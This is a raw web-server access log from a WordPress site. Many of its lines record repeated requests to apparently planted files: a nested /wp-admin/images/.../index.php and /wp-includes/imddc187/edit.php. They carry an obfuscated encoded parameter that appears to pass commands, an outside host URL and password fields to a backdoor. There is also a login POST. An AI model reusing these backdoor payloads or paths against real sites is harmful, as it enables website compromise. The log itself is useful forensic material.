179.188.53.243 - - [15/Mar/2026:02:47:42 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373236322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333636322q3938303461633264636337323336353038363633643233313463636537626139222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
66.249.74.160 - - [15/Mar/2026:02:52:41 -0300] "GET /shop/pg/89considerably/36683 HTTP/1.1" 200 210460 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [15/Mar/2026:02:48:04 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373238342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333638342q3065356334656239346135663136646661656266666233313866646135326433222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:51:39 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:48:25 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373330352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333730352q3138333732333636613363326362666337633766313266623931376238333363222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:48:47 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373332372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333732372q3364396263363133373739366630613536623964386139323965313436376336222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [15/Mar/2026:02:53:57 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:49:12 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373335322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333735322q3737633138643539623034336266646233396130633665366336376238646332222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:49:33 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373337332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333737332q3231303135373432386339666336653765666438626137383438373837383433222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:53:15 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:49:54 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373339342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333739342q3261353435303237653630643430346231643938383935643866316235643733222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:50:15 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373431352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333831352q6630666337326465646532633730316335333132633766613262376365646564222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:50:36 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373433362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333833362q6261376434366265383161626535363837613930343337393436633333333465222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:50:57 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373435372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333835372q3932356238656634383734383032346234326339303561366337313835363431222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:54:45 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:51:18 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373437382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333837382q3936666362396532663564653766663932633466353938363832353039363964222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [15/Mar/2026:02:56:22 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:51:39 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373439392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333839392q3035326166663232623539656330323066663635623131336535616233366235222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:52:00 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373532302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333932302q6264303566326430316538623033323461653764383230623031316535363938222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:52:22 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373534322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333934322q6237366665633333336434663533656334663838646139656264366661623731222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:52:43 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373536332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333936332q3963323866306337323965346538633530653437616336633332383762366532222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:56:18 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:53:05 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373538352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535333938352q6266323236376263633739363765613933363738316231656333333238366336222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:53:26 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373630362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343030362q3161313962353135313038306638313562646437393262363261313231646334222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:53:47 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373632372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343032372q3933643834393039306136653935336231383936383064616232383361633464222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:54:08 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373634382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343034382q3939613838613161336530616665373437613533383630623265313633633662222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:57:50 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.244.31 - - [15/Mar/2026:02:59:19 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:54:33 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373637332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343037332q3832313764633631646536326136393466646431663639356231656530346466222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:54:54 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373639342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343039342q6266356639326130623762313838306662313433653365383161353363653531222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:55:15 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373731352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343131352q6539323633356161396231313232623632356564633732313665373866333166222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:55:37 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373733372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343133372q6434336238313934636537616266616561623330373431386237353635353031222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:59:23 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:55:58 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373735382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343135382q3131386166363363383065623439323330356266656361356162306163383533222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:56:19 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373737392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343137392q6332626563376164646366653064633833346132323562373939303435353965222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:56:40 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373830302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343230302q6465633931633930376231353166626632303538653833663763663339613938222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [15/Mar/2026:03:01:44 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:57:01 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373832312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343232312q3934643136646435313339343839646165363739653865656166656432306463222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:57:22 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373834322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343234322q6462333639306562663036316161633363376536616537343132663364396437222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:03:00:54 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
208.109.188.137 - - [15/Mar/2026:03:02:30 -0300] "GET /wp-login.php HTTP/1.1" 200 72780 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; wbx 1.0.0)"
179.188.53.243 - - [15/Mar/2026:02:57:44 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373836342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343236342q3362333666353337303439373666663734366363623563343363386631336661222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
208.109.188.137 - - [15/Mar/2026:03:02:33 -0300] "POST /wp-login.php HTTP/1.1" 200 72780 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; wbx 1.0.0)"
179.188.53.243 - - [15/Mar/2026:02:58:05 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373838352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343238352q6134623035636138383065646339393834363464353162346265306638396337222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:58:27 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373930372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343330372q3839333462306634643437346665386639313635336537636433326131326561222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:58:48 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373932382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343332382q3765313266386439633736343631663036373861663234656333386263306465222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:03:02:33 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:59:09 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373934392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343334392q3534663566616537653632313933306666323266653466633630316666303634222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [15/Mar/2026:03:04:21 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:59:31 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373937312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343337312q3763656539646237356331326563633362656430383537636132336630316430222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:59:53 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535373939332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343339332q3566636236316335376561353361373130373838333732336533613035326139222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:03:00:15 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535383031352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343431352q3937663938633365373033643065383066343131623830616239393064653139222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:03:04:04 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.13.158.153 - - [15/Mar/2026:03:05:18 -0300] "GET / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
179.188.53.243 - - [15/Mar/2026:03:00:36 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535383033362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535343433362q3239653534623733323862383836626434363463323930343737626636343934222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
